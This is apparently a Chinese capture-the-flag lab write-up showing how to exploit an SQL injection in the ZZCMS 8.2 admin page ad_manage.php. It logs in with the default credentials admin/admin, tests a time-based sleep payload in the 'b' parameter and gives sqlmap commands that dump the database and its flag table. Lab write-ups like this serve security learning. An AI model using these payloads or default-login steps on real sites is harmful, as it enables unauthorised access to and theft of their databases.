靶标介绍:
站长招商网内容管理系统简称 ZZCMS,由ZZCMS团队开发,融入数据库优化,内容缓存,AJAX等技术,使网站的安全性 、稳定性 、负载能力得到可靠保障。源码开放,功能模块独立,便于二次开发。 zzcms8.2中在admin/ad_manage.php存在sql注入漏洞
漏洞复现:
根据这位大佬的分析找到的注入点https://github.com/xunyang1/ZZCMS/issues/1
进入场景后,根据“靶标介绍”,找到后台地址。弱口令admin,admin
在登录成功后访问到页面,然后访问存在sql注入的位置,并使用burpsuite抓包,尝试构造poc
?b=A%27%20%26%26%20sleep(5)%23
发现响应时间被延长到了6秒,说明注入点存在,将数据包保存下来,使用sqlmap来进行注入
sqlmap -r 101.txt -p b
爆数据库
sqlmap -r 101.txt -p b -dbs
爆表
sqlmap -r 101.txt -p b -D zzcms --tables
找到flag表,将数据爆出来
sqlmap -r 101.txt -p b -D zzcms -T flag --dump